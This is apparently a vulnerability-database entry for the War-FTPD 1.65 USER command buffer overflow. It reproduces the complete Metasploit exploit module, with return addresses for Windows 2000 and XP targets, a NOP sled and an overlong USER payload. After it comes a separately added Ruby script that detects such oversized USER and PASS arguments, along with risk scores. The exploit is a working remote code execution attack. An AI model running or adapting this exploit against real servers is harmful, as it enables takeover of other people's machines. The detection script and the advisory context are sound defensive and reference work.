War-FTPD 1.65 Username Overflow

Date: 08 Jan 2006 14:59:27
Reported by: Fairuzan Roslan <[email protected]>
Type: metasploit
Source: www.rapid7.com

War-FTPD 1.65 Username Overflow module exploits buffer overflow in USER comman

Related

| Reporter | Title | Published | Family |
|---|---|---|---|
| Metasploit | War-FTPD 1.65 Password Overflow | 13 Dec 2006 05:46 | metasploit |
| OpenVAS | War FTP Daemon USER/PASS Overflow | 3 Nov 2005 00:00 | openvas |
| OpenVAS | War FTP Daemon USER/PASS Overflow | 3 Nov 2005 00:00 | openvas |
| Cvelist | CVE-1999-0256 | 29 Sep 1999 04:00 | cvelist |
| Cvelist | CVE-2007-1567 | 21 Mar 2007 21:00 | cvelist |
| NVD | CVE-1999-0256 | 1 Feb 1998 05:00 | nvd |
| NVD | CVE-2007-1567 | 21 Mar 2007 21:19 | nvd |
| Tenable Nessus | WarFTPd USER/PASS Command Remote Overflow | 22 Jan 2003 00:00 | nessus |
| Packet Storm | War-FTPD 1.65 Password Overflow | 26 Nov 2009 00:00 | packetstorm |
| Packet Storm | War-FTPD 1.65 Username Overflow | 30 Oct 2009 00:00 | packetstorm |

Code

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = AverageRanking

  include Msf::Exploit::Remote::Ftp

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'War-FTPD 1.65 Username Overflow',
      'Description'    => %q{
          This module exploits a buffer overflow found in the USER command
        of War-FTPD 1.65.
      },
      'Author'         => 'Fairuzan Roslan <riaf[at]mysec.org>',
      'License'        => BSD_LICENSE,
      'References'     =>
        [
          [ 'CVE', '1999-0256'],
          [ 'OSVDB', '875'    ],
          [ 'BID', '10078'    ]
        ],
      'DefaultOptions' =>
        {
          'EXITFUNC' => 'process'
        },
      'Payload'        =>
        {
          'Space'    => 424,
          'BadChars' => "\x00\x0a\x0d\x40",
          'StackAdjustment' => -3500,
          'Compat'   =>
            {
              'ConnectionType' => "-find"
            }
        },
      'Platform'       => 'win',
      'Targets'        =>
        [
          # Target 0
          [
            'Windows 2000 SP0-SP4 English',
            {
              'Ret'      => 0x750231e2 # ws2help.dll
            },
          ],
          # Target 1
          [
            'Windows XP SP0-SP1 English',
            {
              'Ret'      => 0x71ab1d54 # push esp, ret
            }
          ],
          # Target 2
          [
            'Windows XP SP2 English',
            {
              'Ret'      => 0x71ab9372 # push esp, ret
            }
          ],
          # Target 3
          [
            'Windows XP SP3 English',
            {
              'Ret'      => 0x71ab2b53 # push esp, ret
            }
          ]
        ],
      'DisclosureDate' => '1998-03-19'))
  end

  def exploit
    connect

    print_status("Trying target #{target.name}...")

    buf          = make_nops(600) + payload.encoded
    buf[485, 4]  = [ target.ret ].pack('V')

    send_cmd( ['USER', buf] , false )

    handler
    disconnect
  end
end
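
For detection, the request this module sends stands out on the FTP control channel: a USER command whose argument runs to hundreds of bytes of non-printable data. The Ruby below is an added example, not part of the module or of Metasploit; the 128-byte limit, the function names and the sample traffic are assumptions constructed for illustration.

```ruby
# Added example (not part of the Metasploit module): flag FTP control-channel
# lines whose USER/PASS argument is too long or carries non-printable bytes.
# MAX_ARG_LEN is an assumed policy limit, not a value taken from War-FTPD.
MAX_ARG_LEN = 128

Finding = Struct.new(:line_no, :verb, :arg_len, :reasons)

# Split a raw client-to-server byte stream into FTP command lines.
# Lines end in CRLF per RFC 959; a bare LF is tolerated.
def ftp_lines(stream)
  stream.b.split(/\r?\n/n)
end

# Return a Finding for every USER/PASS line that violates the policy.
def inspect_ftp_stream(stream, max_len: MAX_ARG_LEN)
  findings = []
  ftp_lines(stream).each_with_index do |line, idx|
    verb, arg = line.split(' ', 2)
    next unless verb && %w[USER PASS].include?(verb.upcase)

    arg ||= ''.b
    reasons = []
    reasons << :too_long if arg.bytesize > max_len
    reasons << :non_printable if arg.match?(/[^\x20-\x7e]/n)
    next if reasons.empty?

    findings << Finding.new(idx + 1, verb.upcase, arg.bytesize, reasons)
  end
  findings
end

# Constructed sample traffic: one normal login, then an oversized USER
# argument of 0x90 filler bytes (the shape of the request, not a payload).
SAMPLE = "USER alice\r\nPASS s3cret\r\n".b + 'USER '.b + ("\x90".b * 600) + "\r\n".b

if __FILE__ == $PROGRAM_NAME
  inspect_ftp_stream(SAMPLE).each do |f|
    puts "line #{f.line_no}: #{f.verb} arg=#{f.arg_len} bytes (#{f.reasons.join(', ')})"
  end
end
```

The same length check applies to PASS, which the related War-FTPD 1.65 Password Overflow entry covers.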

08 Jan 2006 14:27 (current)
Vulners AI Score: 0.2 (Low risk)
CVSS2: 7.5
EPSS: 0.80651